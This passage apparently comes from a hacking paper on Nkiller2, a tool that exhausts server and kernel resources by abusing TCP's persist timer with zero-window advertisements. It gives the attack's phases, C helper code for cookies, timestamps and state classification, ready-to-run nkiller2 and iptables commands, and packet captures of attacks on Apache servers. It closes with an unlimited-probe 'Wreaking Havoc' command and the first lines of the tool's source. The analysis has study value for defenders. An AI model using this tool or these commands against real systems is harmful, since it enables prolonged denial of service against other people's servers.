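Nkiller2.

```c
#include <assert.h>

/* Assumed default of tcp_retries2 (max_probes for a live socket). */
#define MAX_PROBES 15

/*
 * Simulate 'timer_fires' expirations of the probe timer.
 * ack_every == 0 means the peer never answers; otherwise the peer sends a
 * zero window ACK after every 'ack_every' probes, which resets the counter.
 * Returns the number of probes sent before the connection is dropped,
 * or -1 if the connection survived all timer expirations.
 */
static int simulate_probes(int timer_fires, int ack_every)
{
    int probes_out = 0;   /* stands in for icsk->icsk_probes_out */
    int sent = 0;

    assert(timer_fires >= 0 && ack_every >= 0);

    for (int i = 0; i < timer_fires; i++) {
        if (probes_out > MAX_PROBES)
            return sent;          /* tcp_write_err() would fire here */

        probes_out++;             /* tcp_send_probe0() sends a probe */
        sent++;

        if (ack_every != 0 && sent % ack_every == 0)
            probes_out = 0;       /* tcp_ack() resets icsk_probes_out */
    }
    return -1;
}
```

A silent peer is dropped after 16 probes in this model, while a peer that
answers every 10th probe with a zero window ACK is never dropped, no
matter how many times the timer fires.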

It is now time to dive into the nitty-gritty details of the attack.


-- [ 4 - The attack

We are going to analyse the attack steps along with a tool that automates
the whole procedure, Nkiller2. Nkiller2 is a major expansion of the
original Nkiller I had written some time ago and which was based on the
idea at [1]. Nkiller2 takes the attack to another level, that we shall
discuss shortly.


---- [ 4.1 - Kernel memory exhaustion pitfalls

The idea presented at [1] was, at the time it was published, an almost
deadly attack. Netkill's purpose was to exhaust the available kernel
memory by issuing multiple requests that would go unanswered on the 
receiver's end as far as the ACKing of the data was concerned. These
requests would hopefully involve the sending of a small amount of data,
such that the user application would write the data all at once, issue
a close(2) call and move on to serve the rest of the requests. As we
mentioned before, once the application has closed the socket, the TCP
state becomes FIN_WAIT_1, in which the socket is marked as orphan, meaning
it is detached from userspace and no longer clogs the connection queue.
Hence, a rather large number of such requests can be made without being
concerned that the user application will run out of available connection
slots. Each request partially fills the corresponding kernel buffers,
thus bringing the system to its knees once no more kernel memory is
available.

However, the idea behind Netkill no longer poses a threat to modern
network stack implementations. Most of them provide mechanisms that
nullify the attack's potential by instantly killing any orphan sockets
when memory is urgently needed. For example, Linux calls a specific
handler, tcp_out_of_resources(), which deals with such situations.


net/ipv4/tcp_timer.c:
/---------------------------------------------------------------------\

/* Do not allow orphaned sockets to eat all our resources.
 * This is direct violation of TCP specs, but it is required
 * to prevent DoS attacks. It is called when a retransmission timeout
 * or zero probe timeout occurs on orphaned socket.
 *
 * Criteria is still not confirmed experimentally and may change.
 * We kill the socket, if:
 * 1. If number of orphaned sockets exceeds an administratively configured
 *    limit.
 * 2. If we have strong memory pressure.
 */
static int tcp_out_of_resources(struct sock *sk, int do_reset)
{
    struct tcp_sock *tp = tcp_sk(sk);
    int orphans = atomic_read(&tcp_orphan_count);

    /* If peer does not open window for long time, or did not transmit 
     * anything for long time, penalize it. */
    if ((s32)(tcp_time_stamp - tp->lsndtime) > 2*TCP_RTO_MAX || !do_reset)
        orphans <<= 1;

    /* If some dubious ICMP arrived, penalize even more. */
    if (sk->sk_err_soft)
        orphans <<= 1;

    if (orphans >= sysctl_tcp_max_orphans ||
        (sk->sk_wmem_queued > SOCK_MIN_SNDBUF &&
         atomic_read(&tcp_memory_allocated) > sysctl_tcp_mem[2])) {
        if (net_ratelimit())
            printk(KERN_INFO "Out of socket memory\n");

        /* Catch exceptional cases, when connection requires reset.
         *      1. Last segment was sent recently. */
        if ((s32)(tcp_time_stamp - tp->lsndtime) <= TCP_TIMEWAIT_LEN ||
            /*  2. Window is closed. */
            (!tp->snd_wnd && !tp->packets_out))
            do_reset = 1;
        if (do_reset)
            tcp_send_active_reset(sk, GFP_ATOMIC);
        tcp_done(sk);
        NET_INC_STATS_BH(LINUX_MIB_TCPABORTONMEMORY);
        return 1;
    }
    return 0;
}

\---------------------------------------------------------------------/


The comments and the code speak for themselves. tcp_done() moves the
TCP state to TCP_CLOSE, essentially killing the connection, which will
probably be in FIN_WAIT_1 state at that time (the tcp_done function is
also called by tcp_write_err() mentioned above).
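
To see how the two penalties interact, here is a userspace model of the
orphan-count half of the test. It is a sketch under stated assumptions:
orphan_limit_hit() is a hypothetical name, the memory-pressure half of
the condition is left out on purpose, and the limit of 8192 used in the
note below is just an example value for 'sysctl_tcp_max_orphans'.

```c
#include <assert.h>

/*
 * Model of the orphan-count test in tcp_out_of_resources().
 * Returns 1 if the orphaned socket would be killed.
 */
static int orphan_limit_hit(int orphans, int max_orphans,
                            int idle_or_no_reset, int soft_error)
{
    assert(orphans >= 0 && orphans < (1 << 28));  /* room for two shifts */

    if (idle_or_no_reset)
        orphans <<= 1;   /* peer kept the window shut or stayed silent */
    if (soft_error)
        orphans <<= 1;   /* a dubious ICMP error was seen */

    return orphans >= max_orphans;
}
```

With a limit of 8192, 3000 orphans survive one penalty (6000) but not
both (12000), so a penalized peer effectively sees a quarter of the
configured limit.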

In addition to the above pitfall, the way Netkill works wastes a lot of
bandwidth on both sides, making the attack more noticeable and less
efficient. Netkill sends a flurry of SYN packets to the victim, waits for
the SYNACK and responds by completing the 3-way handshake and piggybacking
the payload request on that ACK. Since any data replies from the victim's
user application (usually a web server) will go unacknowledged, TCP will
start retransmitting these packets. These packets, however, carry a load
of data whose size is proportional to the initial window and MSS
advertised. The minimum amount of data is usually 512 bytes which, given
the vast number of retransmissions that will eventually take place, can
lead to network congestion, lost packets and sysadmin red alarms.

As we can see, kernel memory exhaustion is not an easily accomplished
option in today's operating systems, at least by means of a generic DoS
attack. The attack vector has to be adapted to current circumstances.


---- [ 4.2 - Attack Vector

Our goal is to perform a generic DoS attack that meets the following
criteria:

a) The duration of the attack has to be prolonged as long as possible. The
TCP Persist Timer exploitation extends the duration to infinity. The only
time limits that will take place will be the ones imposed by the userspace
application.

b) No resources will be spent on our part to keep any kind of state 
information from the victim. Any memory resources spent will be O(1),
which means regardless of the number of probes we send to the victim, our
own memory needs will never surpass a certain initial amount.

c) Bandwidth consumption will be kept to a minimum. Traffic congestion has
to be avoided if possible. 

d) The attack has to affect the availability of both the userspace
application and the kernel, to the extent that this is feasible.


To meet requirement 'b', we are going to use a packet-triggering behaviour
and the, now old, technique of reverse (or client) syn cookies. Basically,
this means that our answers will strictly depend on nothing else other 
than the packets received from the victim. How is this even possible? We
are going to use a series of packet-parsing techniques and craft the
packets in such a way that they carry within themselves any information
that is needed to make decisions.


The general procedure will go like this:

- Phase 1.

Attacker sends a group of SYN packets to the victim. In the sequence
number field, he has encoded a magic number that stems from the
cryptographic hash of { destination IP & port, source IP & port } and a
secret key. This way, he can discern whether any SYNACK packet he gets
actually corresponds to the SYN packets he just sent. He can accomplish
that by comparing the (ACK seq number - 1) of the victim's SYNACK reply
with the hash of the same packet's socket quadruple based on the secret
key. We subtract 1, since the SYN flag occupies one sequence number
as stated by RFC 793. The above technique is known as reverse SYN cookies:
they differ from the usual SYN cookies, which protect against SYN
flooding, in that they are used from the reverse side, namely the client
and not the server. Nkiller2's calc_cookie() function is responsible for
the cookie calculation and subsequent encoding.

Now, apart from the sequence number encoding, we are also going to use a
nifty facility that TCP provides, as means to our own ends. The TCP
Timestamp Option is normally used as another way to estimate the RTT.
The option uses two 32bit fields, 'tsval' which is a value that increases
monotonically by the TCP timestamp clock and which is filled in by the
current sender and 'tsecr' - timestamp echo reply - which is the peer's
echoed value as stated in the tsval of the packet to which the current one
replies. The host initiating the connection places the option in the
first SYN packet, by filling tsval with a value, and zeroing tsecr. Only
if the peer replies with a Timestamp in the SYNACK packet, can any future
segments keep containing the option. build_timestamp() embeds the
timestamp option in the crafted TCP header, while get_timestamp() extracts
it from a packet reply.

      TCP Timestamps Option (TSopt):

         Kind: 8

         Length: 10 bytes

          +-------+-------+---------------------+---------------------+
          |Kind=8 |  10   |   TS Value (TSval)  |TS Echo Reply (TSecr)|
          +-------+-------+---------------------+---------------------+
              1       1              4                     4
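
The layout above translates into a few lines of C. The sketch below is
not Nkiller2's build_timestamp()/get_timestamp() pair; ts_option_write()
and ts_option_read() are hypothetical helpers that show one way to
serialize the option (followed by two NOPs for 4-byte alignment, which is
an assumption about padding) and to find it again in an option area.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TCPOPT_TS_KIND   8
#define TCPOPT_TS_LEN    10
#define TCPOPT_NOP_KIND  1

/* Store a 32-bit value in network byte order. */
static void put_be32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24);
    p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);
    p[3] = (uint8_t)v;
}

/* Load a 32-bit value stored in network byte order. */
static uint32_t get_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Write TSopt followed by two NOPs (12 bytes in total).
 * Returns the number of bytes written. */
static size_t ts_option_write(uint8_t *buf, uint32_t tsval, uint32_t tsecr)
{
    assert(buf != NULL);
    buf[0] = TCPOPT_TS_KIND;
    buf[1] = TCPOPT_TS_LEN;
    put_be32(buf + 2, tsval);
    put_be32(buf + 6, tsecr);
    buf[10] = TCPOPT_NOP_KIND;
    buf[11] = TCPOPT_NOP_KIND;
    return 12;
}

/* Walk a TCP option area looking for TSopt. Returns 1 if found, else 0. */
static int ts_option_read(const uint8_t *opts, size_t len,
                          uint32_t *tsval, uint32_t *tsecr)
{
    size_t i = 0;

    while (i < len) {
        uint8_t kind = opts[i];

        if (kind == 0)                    /* End of Option List */
            break;
        if (kind == TCPOPT_NOP_KIND) {    /* NOP is a single byte */
            i++;
            continue;
        }
        if (i + 1 >= len || opts[i + 1] < 2 || i + opts[i + 1] > len)
            break;                        /* malformed option length */
        if (kind == TCPOPT_TS_KIND && opts[i + 1] == TCPOPT_TS_LEN) {
            *tsval = get_be32(opts + i + 2);
            *tsecr = get_be32(opts + i + 6);
            return 1;
        }
        i += opts[i + 1];                 /* skip any other option */
    }
    return 0;
}
```

The reader has to skip NOPs and unrelated options because the peer is
free to order its options differently from ours.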

We are going to use the Timestamp option as a means to track time. We will
later have to exploit the TCP Persist Timer and eventually answer some of
its probes, but this will involve calculating how much time has passed.
Consequently, we are going to encode our own system's current time
inside the first 'tsval'. In the SYNACK reply that we are going to get,
'tsecr' will reflect that same value. Thus, by subtracting the value
placed in the echo reply field from the current system time, we can deduce
how much time has passed since our last packet transmission without
keeping any stateful information for each probe. We are going to extract
and encode timestamp information from every packet hereafter. Timestamps
are supported by every modern network stack implementation, so we aren't
going to have any trouble dealing with them.
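
The reverse SYN cookie check from the beginning of this phase can be
sketched as follows. Keep in mind the assumptions: Nkiller2 relies on
OpenSSL's HMAC for its calc_cookie(), whereas this sketch swaps in the
non-cryptographic FNV-1a hash purely to stay self-contained, and the
names cookie() and synack_is_ours() are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* FNV-1a, 32 bit. NOT cryptographic; a stand-in for a keyed hash. */
static uint32_t fnv1a(uint32_t h, const void *data, size_t len)
{
    const uint8_t *p = data;

    for (size_t i = 0; i < len; i++) {
        h ^= p[i];
        h *= 16777619u;           /* FNV prime */
    }
    return h;
}

/* Cookie over the secret key and the socket quadruple, seen from the
 * attacker's side (source = us, destination = victim). */
static uint32_t cookie(uint32_t saddr, uint16_t sport,
                       uint32_t daddr, uint16_t dport, const char *key)
{
    uint32_t h = 2166136261u;     /* FNV offset basis */

    assert(key != NULL);
    h = fnv1a(h, key, strlen(key));
    h = fnv1a(h, &saddr, sizeof saddr);
    h = fnv1a(h, &sport, sizeof sport);
    h = fnv1a(h, &daddr, sizeof daddr);
    h = fnv1a(h, &dport, sizeof dport);
    return h;
}

/* A SYNACK is ours if (ack - 1) equals the cookie recomputed from the
 * packet's own addresses and ports, swapped because the packet travels
 * in the opposite direction. No per-connection state is consulted. */
static int synack_is_ours(uint32_t pkt_saddr, uint16_t pkt_sport,
                          uint32_t pkt_daddr, uint16_t pkt_dport,
                          uint32_t pkt_ack, const char *key)
{
    return pkt_ack - 1u ==
           cookie(pkt_daddr, pkt_dport, pkt_saddr, pkt_sport, key);
}
```

The value returned by cookie() is what would go into the sequence number
field of the SYN; everything needed to verify the reply later is carried
by the reply itself.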


- Phase 2.

The victim replies with a SYNACK to each of the attacker's initial SYN
probes. These packets are really easy to tell apart from the rest of the
ones we will be receiving, since no other packet will have both the SYN
flag and the ACK flag set. In addition, as we noted above, we can verify
that these packets actually belong to our own probes, and not to some
other connection happening at the same time to the host, by using the
reverse SYN cookie technique.

We have to mention here that under no circumstances should our own
system's kernel be allowed to interfere with any of our connections.
Thus, we should take care beforehand to filter any traffic destined to or
coming from the victim's attacked ports.

Having gotten the victim's SYNACK replies, we complete the 3-way handshake
by sending the ACK required (send_probe: S_SYNACK). We also piggyback the
data of the targeted userspace application request. We save bandwidth,
time and trouble by adopting a perfectly allowable behaviour. Nothing
else exciting happens here.


- Phase 3.

Now things get a bit more complicated. It is here that the road starts
forking depending on the target host's network stack implementation.
Nkiller2 uses the notion of virtual states, as I called them, which are
a way to differentiate between each unique case by parsing the packet
for relevant information. The handler responsible for parsing the victim's
replies and deciding the next virtual state is check_replies(). It sets
the variable 'state' accordingly and main() can then deduce, inside its
main loop, the next course of action, essentially by calling the generic
send_probe() packet-crafter with the proper state argument and updating
some of its own loop variables.

First case: the target host sends a pure ACK (meaning a packet with no
data), which acknowledges our payload sent in Phase 2. This virtual
state is mentioned as S_FDACK (State - First Data Acknowledgment) in the
Nkiller2 codebase.

Second case: the target host sends the ACK which acknowledged our payload
from Phase 2, piggybacked with the first data reply of the userspace
application to which we made the request. This usually happens due to the
Delayed Acknowledgment functionality, according to which TCP waits for a
short time (on the order of milliseconds) to see if there is any data
which it can send along with an ACK.

Usually, Linux behaviour follows the first case while *BSD and Windows
follow the second. The critical question here is when to send the zero
window advertisement. Ideally, we could reply to the first case's pure
ACK with an ACK of our own (with the same acknowledgment number as the 
sequence number in the victim's packet) that advertised a zero window.
However, in most cases we won't have that chance, since the victim's
TCP will send, immediately after this pure ACK, the first data of the
userspace application in a separate segment. Thus, if we advertise a
zero window when the opposite TCP has already written the first data to
the network, we will fail to trigger the Persist Timer, as we saw
during the analysis in part 3 of this paper. Consequently, we play it
safe and choose to ignore the FDACK and wait for the first segment of
data to arrive.


- Phase 4.

This stage also differs from one operating system to another, since it
is deeply connected to Phase 3. For every number mentioned from now on,
assume that Nkiller's initial window advertisement and mss is 1024.
Linux, under normal circumstances, will send two data segments with a 
minimum amount of 512 bytes each. Additionally, any data segment following
the first one, will have the PUSH flag set. On the other hand, *BSD and 
BSD-derivative implementations will send one bigger data segment of 1024
bytes, without setting the PUSH flag.
To be able to take the right decisions for each unique case involved,
Nkiller2 will have to be provided with a template number. It is trivial to
identify the different network stacks by using already existing tools, so
when you are unsure about the target system, either use Nmap's OS
fingerprinting capability or at worst, a trial-and-error method. At the
moment with only 2 different templates (T_LINUX and T_BSDWIN), Nkiller2
is able to work against a vast amount of systems.
In the default template (Linux), Nkiller2 is going to send a zero window
advertisement on the ACK of the second segment (which is going to involve
acking the first segment as well), while when dealing with BSD or Windows,
it will send it on the ACK of the first and only data segment. The
resolving between these two cases takes place in send_probe()'s main body
in 'case S_DATA_0' (State - Data 0, as in first data packet).
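
The template decision can be condensed into one small function. This is
a sketch and not the body of send_probe(): ack_for_data() and struct
ack_reply are hypothetical, and the rule that the intermediate ACK
advertises the initial window minus the data received so far is an
assumption made for illustration.

```c
#include <assert.h>
#include <stdint.h>

enum os_template { T_LINUX, T_BSDWIN };
enum data_state  { S_DATA_0, S_DATA_1 };

struct ack_reply {
    uint32_t ack;      /* acknowledgment number to send */
    uint16_t window;   /* window to advertise */
};

/* Decide how to acknowledge a data segment of 'datalen' bytes that
 * starts at sequence number 'seq'. */
static struct ack_reply ack_for_data(enum os_template tmpl,
                                     enum data_state st,
                                     uint32_t seq, uint16_t datalen,
                                     uint16_t init_window)
{
    struct ack_reply r;

    assert(datalen <= init_window);
    r.ack = seq + datalen;

    if (tmpl == T_BSDWIN || st == S_DATA_1)
        r.window = 0;   /* last expected segment: close the window */
    else
        r.window = (uint16_t)(init_window - datalen);  /* Linux, 1st seg */
    return r;
}
```

For T_LINUX with relative sequence numbers, the first 512-byte segment
yields ACK 513 with a window of 512 and the second yields ACK 1025 with
a window of 0; for T_BSDWIN the single segment is answered with a zero
window right away.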


- Phase 5.

Having successfully sent the zero window packet (regardless of how and
when that happened), the target host's TCP will start sending zero probes.
This is where we meet requirement 'c', limiting bandwidth waste. Every
retransmission that takes place will involve pure ACKs (Linux) or at most
1 byte of data (BSD/Windows). Every zero probe is only 52 bytes long,
counting TCP/IP headers and the TCP Timestamp option, in contrast with the
size of the retransmission packets (512 + 40 bytes or 1024 + 40 bytes
each) that would be sent if we had triggered the TCP retransmission timer,
as in Netkill's case.

An interesting issue here is deciding when best to reply to the zero
probes, so that the TCP persist timer is prolonged indefinitely with the
fewest packets possible. Using the TCP timestamp technique, we can
calculate the time elapsed from the moment we sent the zero window
advertisement (since that was our last packet and that one's time value
will be echoed in 'tsecr') to the moment we got the packet.


check_replies()
/---------------------------------------------------------------------\


      if (get_timestamp(tcp, &tsval, &tsecr)) {
        if (gettimeofday(&now, NULL) < 0)
          fatal("Couldn't get time of day\n");
        time_elapsed = now.tv_sec - tsecr;
        if (o.debug) 
          (void) fprintf(stdout, "Time elapsed: %u (sport: %u)\n",
              time_elapsed, sockinfo.sport);
      }

      ...

      if (ack == calc_ack && (!datalen || datalen == 1) 
          && time_elapsed >= o.probe_interval) {
        state = S_PROBE;
        goodone++;
        break;
      }

\---------------------------------------------------------------------/


Hence, we can decide whether or not we should send a reply to the
current zero probe (S_PROBE), depending on a predetermined rough estimate
of the time lapse. We also use this 'probe_interval' value to
differentiate between a zero probe and the FDACK, since there are no other
packet characteristics, apart from arrival time, that we can take into
account in this stateless manner. This phase marks the accomplishment of
goal 'a': prolonging the attack as much as possible.


A graphical representation of the procedure is shown below. Remember that
the states are purely virtual. We do not keep any kind of information on
our part.


      (cookie OK)   +----------+ 
 SYN -------------> | S_SYNACK | 
      rcv SYNACK    +----------+ 
                          |       
               ACK SYNACK |
            send request  |
                          |     pure ACK       +---------+ 
                          | ---------------->  | S_FDACK | 
                          |   time_elapsed <   +---------+ 
                          |   probe_interval      ignore
                          |
                 got Data |   
                          V                         
                     +----------+       
                     | S_DATA_0 |
                     +----------+       
                          |
                         / \
                        /   \ 
          T_BSDWIN     /     \   T_LINUX (default)
      ----------------/       \ ---------------        
      |                                       |
      |                                       | got Data (PSH)
      |                                       | ACK(data0)
      V                                       V
  ACK(data0) &                          +----------+
  send 0 window                         | S_DATA_1 |      
      |                                 +----------+
      |---------------         ---------------|
                      \       /   ACK(data1) & send 0 window
                       \     /
                        \   /
                         \ /
     |------> time_elapsed >= probe_interval
     |                    |
     |                    |
     |                    V
     |               +---------+
     |               | S_PROBE | --------> send probe reply
     |               +---------+
     |                    |    
     |--------------------|
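

The decisions in the diagram above can be expressed as a pure function of
the packet just received. The sketch below is a simplification and not
check_replies() itself: classify() and S_IGNORE are hypothetical, the two
data states are folded into a single S_DATA, and the acknowledgment
number check of the real code is left out.

```c
#include <assert.h>
#include <stdint.h>

#define FLAG_SYN 0x02   /* TCP SYN bit */
#define FLAG_ACK 0x10   /* TCP ACK bit */

enum vstate { S_IGNORE, S_SYNACK, S_FDACK, S_DATA, S_PROBE };

/*
 * Pick a virtual state from the packet alone. 'cookie_ok' says whether
 * the reverse SYN cookie matched; 'time_elapsed' is the current time
 * minus the echoed 'tsecr', in seconds.
 */
static enum vstate classify(uint8_t flags, uint32_t datalen, int cookie_ok,
                            uint32_t time_elapsed, uint32_t probe_interval)
{
    assert(probe_interval > 0);

    if ((flags & (FLAG_SYN | FLAG_ACK)) == (FLAG_SYN | FLAG_ACK))
        return cookie_ok ? S_SYNACK : S_IGNORE;
    if (!(flags & FLAG_ACK))
        return S_IGNORE;
    if (datalen > 1)
        return S_DATA;            /* application data, not a probe */

    /* 0 or 1 byte: either the first pure ACK or a zero window probe. */
    if (time_elapsed >= probe_interval)
        return S_PROBE;           /* old enough: answer this probe */
    return datalen == 0 ? S_FDACK : S_IGNORE;
}
```

Since the function takes no connection table as input, memory use stays
constant regardless of how many connections are being held open, which
is what requirement 'b' asks for.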


The only thing that still needs to be answered is to what extent we have
achieved goal 'd'. How efficient is the attack really? The answer is, that
it depends on what we are attacking. Attacking one userspace application
will usually lead to either backlog queue collapse or reaching the maximum
allowable number of concurrent accepted connections. In both cases, the
availability of the userspace application will drop down to zero and will
stay in that condition for a possibly unlimited amount of time. Keep in
mind though that robust server applications like Apache have a Timeout of
their own, which is independent of TCP's. Quoting from Apache's manual:

   "The TimeOut directive currently defines the amount of time Apache will
    wait for three things:

   1. The total amount of time it takes to receive a GET request.
   2. The amount of time between receipt of TCP packets on a POST or PUT
        request.
   3. The amount of time between ACKs on transmissions of TCP packets in
        responses."

By default, Apache httpd's TimeOut = 300 which means 5 minutes. Following
a similar approach, lighttpd's default timeout is about 6 minutes.
Even then, as long as the attack cycle continues (Hint: Nkiller's option
-n0), there is no hope for any server not protected by a stateful firewall
that limits the total number of packets reaching the host (which still
won't be enough by itself given the TCP Persist Timer's exploitation).

At the same time, useful kernel resources are wasted on the SendQueue of
each established connection. However, for kernel memory exhaustion to
occur, we will have to perform a concurrent attack at multiple
applications (Nkiller2 isn't optimized for this though). This way,
the amount of kernel resources wasted will be proportional to the number
of the attacked applications and the amount of successful connections on
each of them. Even if one service is brought down temporarily for one
reason or another, there will still be the other applications wasting
memory with a filled up TCP SendQueue.


---- [ 4.3 - Test cases

Time for some real world examples. We are going to demonstrate how
Nkiller2 exploits the Persist Timer functionality and at the same time
point out the different behaviour that is exhibited from a Linux system
in contrast with an OpenBSD system. The file requested has to be more
than 4.0 Kbytes (experimental value).

- Test Case 1.

Attacker: 10.0.0.12, Linux 2.6.26
Target: 10.0.0.50, Apache1.3, OpenBSD 4.3

# iptables -A INPUT -s 10.0.0.50 -p tcp --dport 80 -j DROP
# iptables -A INPUT -s 10.0.0.50 -p tcp --sport 80 -j DROP
# ./nkiller2 -t 10.0.0.50 -p80 -w /file -v -n1 -T1 -P120 -s0 -g

Starting Nkiller 2.0 ( http://sock-raw.org )
Probes: 1
Probes per round: 100
Pcap polling time: 100 microseconds
Sleep time: 0 microseconds
Key: Nkiller31337
Probe interval: 120 seconds
Template: BSD | Windows
Guardmode on


# tcpdump port 80 and host 10.0.0.50 -n

08:55:30.017021 IP 10.0.0.12.40428 > 10.0.0.50.80: S 3456779693:
3456779693(0) win 1024 <timestamp 1232693730 0,nop,nop,mss 1024>
08:55:30.017280 IP 10.0.0.50.80 > 10.0.0.12.40428: S 3072651811:
3072651811(0) ack 3456779694 win 16384 <mss 1460,nop,nop,timestamp
464912143 1232693730>
08:55:30.017461 IP 10.0.0.12.40428 > 10.0.0.50.80: . 1:23(22) ack 1
win 1024 <timestamp 1232693730 464912143,nop,nop>
08:55:30.019288 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1:1013(1012) ack 23
win 17204 <nop,nop,timestamp 464912143 1232693730>
08:55:30.019311 IP 10.0.0.12.40428 > 10.0.0.50.80: . ack 1013 win 0
<timestamp 1232693730 464912143,nop,nop>
08:55:35.009929 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912153 1232693730>
08:55:40.009505 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912163 1232693730>
08:55:45.009056 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912173 1232693730>
08:55:53.008388 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912189 1232693730>
08:56:09.007027 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912221 1232693730>
08:56:41.004286 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912285 1232693730>
08:57:40.999239 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912405 1232693730>
08:57:40.999910 IP 10.0.0.12.40428 > 10.0.0.50.80: . ack 1013 win 0
<timestamp 1232693860 464912405,nop,nop>
...


Notice that OpenBSD transmits httpd's initial data in one segment in which
the ACK to our payload is included. Nkiller2 acknowledges that packet,
advertising at the same time a zero window. After that, OpenBSD's TCP
transmits a zero probe and sets the Persist Timer. After a little more
than 120 seconds (57:40 - 55:30), we answer the Persist Timer's probe.
Note that we specified the probe_interval with the option -P120
(approximately 120 seconds).


- Test Case 2.

Attacker: 10.0.0.12, Linux 2.6.26
Target: 10.0.0.101, Apache2.2.3, Debian "etch" (2.6.18)

# iptables -A INPUT -s 10.0.0.101 -p tcp --dport 80 -j DROP
# iptables -A INPUT -s 10.0.0.101 -p tcp --sport 80 -j DROP
# ./nkiller2 -t 10.0.0.101 -p80 -w /file -n1 -T0 -P50 -s0 -v

Starting Nkiller 2.0 ( http://sock-raw.org )
Probes: 1
Probes per round: 100
Pcap polling time: 100 microseconds
Sleep time: 0 microseconds
Key: Nkiller31337
Probe interval: 50 seconds
Template: Linux


# tcpdump port 80 and host 10.0.0.101 -n

01:09:33.350783 IP 10.0.0.12.26528 > 10.0.0.101.80: S 3497611066:
3497611066(0) win 1024 <timestamp 1232752173 0,nop,nop,mss 1024>
01:09:33.350893 IP 10.0.0.101.80 > 10.0.0.12.26528: S 2167814821:
2167814821(0) ack 3497611067 win 5792 <mss 1460,nop,nop,timestamp
4294906445 1232752173>
01:09:33.351189 IP 10.0.0.12.26528 > 10.0.0.101.80: . 1:23(22) ack 1
win 1024 <timestamp 1232752173 4294906445,nop,nop>
01:09:33.351308 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294906445 1232752173>
01:09:33.382100 IP 10.0.0.101.80 > 10.0.0.12.26528: . 1:513(512) ack 23
win 5792 <nop,nop,timestamp 4294906452 1232752173>
01:09:33.382138 IP 10.0.0.101.80 > 10.0.0.12.26528: P 513:1025(512) ack 23
win 5792 <nop,nop,timestamp 4294906452 1232752173>
01:09:33.389359 IP 10.0.0.12.26528 > 10.0.0.101.80: . ack 513 win 512
<timestamp 1232752173 4294906452,nop,nop>
01:09:33.389508 IP 10.0.0.12.26528 > 10.0.0.101.80: . ack 1025 win 0
<timestamp 1232752173 4294906452,nop,nop>
01:09:33.590164 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294906505 1232752173>
01:09:33.998135 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294906607 1232752173>
01:09:34.814073 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294906811 1232752173>
01:09:36.445959 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294907219 1232752173>
01:09:39.709739 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294908035 1232752173>
01:09:46.237279 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294909667 1232752173>
01:09:59.292377 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294912931 1232752173>
01:10:25.402550 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294919459 1232752173>
01:10:25.427760 IP 10.0.0.12.26528 > 10.0.0.101.80: . ack 1024 win 0
<timestamp 1232752225 4294919459,nop,nop>
...


Linux first sends a pure ACK (which is ignored by Nkiller2) and then
transmits the first 2 data segments (512 bytes each). Nkiller2 waits until
both of them arrive and acknowledges each in turn, advertising a zero
window in the ACK of the second one. Linux then starts sending us zero
probes (which have a data length of zero, in contrast with *BSD which
sends 1 byte of data), that go unanswered
until about (10:25 - 09:33) 50 seconds pass.


- Test Case 'Wreaking Havoc'

# nkiller2 -t <target> -p80 -w <path> -n0 -T0 -P100 -s0 -v -N100

-n0: unlimited probes
-N100: will send 100 SYN probes per round (a round finishes when
we either get a data segment or a zero probe)

Use at your own discretion.


--[ 5 - Nkiller2 implementation

/*
 *  Nkiller 2.0 - a TCP exhaustion/stressing tool
 *  Copyright (C) 2009 ithilgore <ithilgore.ryu.L@gmail.com>
 *  sock-raw.org
 *
 *  This program is free software: you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation, either version 3 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

/*
 * COMPILATION:
 *  gcc nkiller2.c -o nkiller2 -lpcap -lssl -Wall -O2
 * Has been tested and compiles successfully on Linux 2.6.26 with gcc
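 * 4.3.2 and FreeBSD 7.0 with gcc 4.2.1
 * HMAC() is provided by libcrypto; if the linker does not pull it in
 * through -lssl, add -lcrypto to the command above.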
 */


/*
 * Enable BSD-style (struct ip) support on Linux.
 */
#ifdef __linux__
# ifndef __FAVOR_BSD
#  define __FAVOR_BSD
# endif
# ifndef __USE_BSD
#  define __USE_BSD
# endif
# ifndef _BSD_SOURCE
#  define _BSD_SOURCE
# endif
# define IPPORT_MAX 65535u
